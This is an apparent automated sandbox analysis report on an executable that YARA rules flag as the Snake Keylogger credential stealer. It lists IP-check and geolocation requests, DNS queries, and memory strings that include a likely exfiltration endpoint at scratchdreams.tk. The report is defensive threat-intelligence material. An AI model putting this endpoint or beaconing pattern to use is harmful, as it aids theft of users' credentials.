Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View	IP Address: 104.21.27.85 104.21.27.85

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49711 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: scratchdreams.tk

Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: DNXS-04-22.exe, 00000000.00000002.1359852790.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: DNXS-04-22.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsdAProNaturBio.Properties.Resources
Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.225
Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.225$
Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.8:49726 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

.NET source code contains very large array initializations

Source: 0.2.DNXS-04-22.exe.2e91290.6.raw.unpack, .cs	Large array initialization: : array initializer size 33957
Source: 0.2.DNXS-04-22.exe.8220000.13.raw.unpack, .cs	Large array initialization: : array initializer size 33957

Source: C:\Users\user\Desktop\DNXS-04-22.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_02C5DF14	0_2_02C5DF14
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_05E586B0	0_2_05E586B0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_05E50040	0_2_05E50040
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_05E50006	0_2_05E50006
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075BB570	0_2_075BB570
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075BB138	0_2_075BB138
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075BB128	0_2_075BB128
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075B4070	0_2_075B4070
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075B20B0	0_2_075B20B0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075B20A0	0_2_075B20A0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075BCD70	0_2_075BCD70
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075BAD00	0_2_075BAD00
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_075BA8AA	0_2_075BA8AA
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_07F33578	0_2_07F33578
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_07F33568	0_2_07F33568
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_07FD74C0	0_2_07FD74C0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_07FD7138	0_2_07FD7138
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 0_2_07FD7137	0_2_07FD7137
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0B4F0	4_2_00D0B4F0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D090A1	4_2_00D090A1
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0A858	4_2_00D0A858
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0D478	4_2_00D0D478
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D015F8	4_2_00D015F8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0C188	4_2_00D0C188
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0DAC0	4_2_00D0DAC0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0AEA8	4_2_00D0AEA8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D08A58	4_2_00D08A58
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0CE28	4_2_00D0CE28
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0C7D8	4_2_00D0C7D8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0BB38	4_2_00D0BB38
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D008F0	4_2_00D008F0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D078F8	4_2_00D078F8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D078E7	4_2_00D078E7
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0B4EE	4_2_00D0B4EE
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D07490	4_2_00D07490
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D00498	4_2_00D00498
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D04880	4_2_00D04880
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D074A0	4_2_00D074A0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D02C57	4_2_00D02C57
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D00040	4_2_00D00040
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0A84F	4_2_00D0A84F
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0D476	4_2_00D0D476
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D07010	4_2_00D07010
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D00013	4_2_00D00013
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D03808	4_2_00D03808
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D07020	4_2_00D07020
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D055D9	4_2_00D055D9
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D085F1	4_2_00D085F1
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D055E8	4_2_00D055E8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0819A	4_2_00D0819A
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0C186	4_2_00D0C186
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D011A0	4_2_00D011A0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D081A8	4_2_00D081A8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D07D50	4_2_00D07D50
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D07D40	4_2_00D07D40
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D00D48	4_2_00D00D48
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D02D00	4_2_00D02D00
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D05EC0	4_2_00D05EC0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D05EB0	4_2_00D05EB0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0AEA4	4_2_00D0AEA4
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0DAAF	4_2_00D0DAAF
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D05A58	4_2_00D05A58
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D08A48	4_2_00D08A48
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D05A68	4_2_00D05A68
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0CE18	4_2_00D0CE18
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D08600	4_2_00D08600
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0C7D6	4_2_00D0C7D6
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D06BC8	4_2_00D06BC8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D03B80	4_2_00D03B80
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D06BB8	4_2_00D06BB8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D06770	4_2_00D06770
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D06760	4_2_00D06760
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D06318	4_2_00D06318
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D06308	4_2_00D06308
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00D0BB34	4_2_00D0BB34
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00E2D89C	4_2_00E2D89C
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00E2D890	4_2_00E2D890
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00E2DEA1	4_2_00E2DEA1
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00E2BFEC	4_2_00E2BFEC
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_00F54758	4_2_00F54758
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CB388	4_2_028CB388
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CC1F0	4_2_028CC1F0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028C6168	4_2_028C6168
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CC7B1	4_2_028CC7B1
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CC4D0	4_2_028CC4D0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CCA91	4_2_028CCA91
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028C4B31	4_2_028C4B31
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028C98B8	4_2_028C98B8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028C68E0	4_2_028C68E0
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CBF10	4_2_028CBF10
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CBC32	4_2_028CBC32
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CF4E8	4_2_028CF4E8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028C35C8	4_2_028C35C8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CEA08	4_2_028CEA08
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CE9F8	4_2_028CE9F8
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_028CF941	4_2_028CF941
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06770C60	4_2_06770C60
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06770040	4_2_06770040
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06774490	4_2_06774490
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06779080	4_2_06779080
Source: C:\Users\user\Desktop\DNXS-04-22.exe	Code function: 4_2_06771DE0	4_2_06771DE0
